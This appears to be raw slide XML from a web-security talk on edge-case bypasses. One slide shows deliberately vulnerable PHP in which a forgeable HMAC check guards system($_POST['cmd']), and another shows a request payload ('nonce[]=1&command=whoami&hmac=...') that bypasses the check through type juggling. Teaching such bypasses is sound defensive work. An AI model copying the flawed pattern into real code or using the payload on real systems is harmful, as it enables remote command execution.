          <p:cNvPr id="190" name="Hash = f(m+s)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="3107938"/>
            <a:ext cx="11430000" cy="2203526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="444498" indent="-444498">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="4800">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   Hash = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C1C1C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444498" indent="-444498">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="4800">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:t>$hash = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sha1</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$message</a:t>
            </a:r>
            <a:r>
              <a:t> . </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$secret</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="If ($user_hash == $server_hash)  // message is trusted"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1703718" y="6834275"/>
            <a:ext cx="9597364" cy="138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solidFill>
                  <a:srgbClr val="E1E1E1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>If (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user_hash</a:t>
            </a:r>
            <a:r>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$server_hash</a:t>
            </a:r>
            <a:r>
              <a:t>)  // message is trusted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ecurity is Hard"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="-626534"/>
            <a:ext cx="11303000" cy="2076120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Security is Hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Why getting security right is about more than just XSS and SQLi"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="subTitle" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850899" y="1511300"/>
            <a:ext cx="11162443" cy="2901620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Why getting security right is about more than just XSS and SQLi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Special Thanks: Orange Tsai, LiveOverflow, Gary Berndhardt"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247582" y="8950190"/>
            <a:ext cx="11510569"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Special Thanks: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Orange Tsai</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LiveOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7FFF7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="514BFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gary Berndhardt</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>James Kettle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="126" name="hard_times.jpg"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5362696" y="3757377"/>
            <a:ext cx="7195490" cy="4942125"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7195488" cy="4942123"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="124" name="hard_times.jpg" descr="hard_times.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190499" y="190500"/>
              <a:ext cx="6814490" cy="4535723"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125" name="hard_times.jpg" descr="hard_times.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="7195490" cy="4942125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Get you to think about some edge cases in web security…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796645" y="2705099"/>
            <a:ext cx="4232967" cy="640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Get you to think about some edge cases</a:t>
            </a:r>
          </a:p>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MySQL auth bypass</a:t>
            </a:r>
          </a:p>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HMAC bypass</a:t>
            </a:r>
          </a:p>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PHP Meltdown</a:t>
            </a:r>
          </a:p>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SSRF bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="407457" indent="-407457" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cache Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>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5" name="&lt;?php…"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-65664" y="287865"/>
            <a:ext cx="12635274" cy="4470404"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12635273" cy="4470402"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="193" name="&lt;?php…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="203200"/>
              <a:ext cx="12254274" cy="4038601"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="404040"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="000000"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gra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2800">
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;?php</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>$secret</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>= </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>getenv</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘secret_token’</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>$secret</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>hash_hmac</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘sha256’</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:t>$_POST[</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘nonce’</a:t>
              </a:r>
              <a:r>
                <a:t>]</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:t>$secret</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>$hmac</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>hash_hmac</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘sha256'</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:t>$_POST[</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘cmd’</a:t>
              </a:r>
              <a:r>
                <a:t>]</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:t>$secret</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>if (</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>$_POST</a:t>
              </a:r>
              <a:r>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘hmac’</a:t>
              </a:r>
              <a:r>
                <a:t>] </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!==</a:t>
              </a:r>
              <a:r>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>$hmac</a:t>
              </a:r>
              <a:r>
                <a:t>) {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="2" algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>die</a:t>
              </a:r>
              <a:r>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“unauthorized”</a:t>
              </a:r>
              <a:r>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1" algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="CBCACC"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>echo </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="C8E059"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>$_POST</a:t>
              </a:r>
              <a:r>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="CF79E0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘cmd’</a:t>
              </a:r>
              <a:r>
                <a:t>]);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="194" name="&lt;?php…" descr="&lt;?php…"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="12635275" cy="4470404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Attacker controls ‘nonce’, ‘cmd’ and ‘hmac’…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711791" y="5213630"/>
            <a:ext cx="11080362" cy="17647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18582" indent="-518582" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Attacker controls ‘nonce’, ‘cmd’ and ‘hmac’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518582" indent="-518582" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘secret_token’ is a strong salt value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="518582" indent="-518582" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="CBCACC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sha256 hmac is a cryptographically secure hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="199" name="nonce[]=1&amp;command=whoami&amp;hmac=aad475b35ab3cd1c0435aabed92890e3890a2e04a45322c584098e488d644baf"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="168433" y="7522632"/>
            <a:ext cx="12794536" cy="1473203"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12794534" cy="1473201"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197" name="nonce[]=1&amp;command=whoami&amp;hmac=aad475b35ab3cd1c0435aabed92890e3890a2e04a45322c584098e488d644baf"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="203200"/>
              <a:ext cx="12413535" cy="1041401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="404040"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="000000"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gra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300">
                  <a:solidFill>
                    <a:srgbClr val="85D4FF"/>
                  </a:solidFill>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
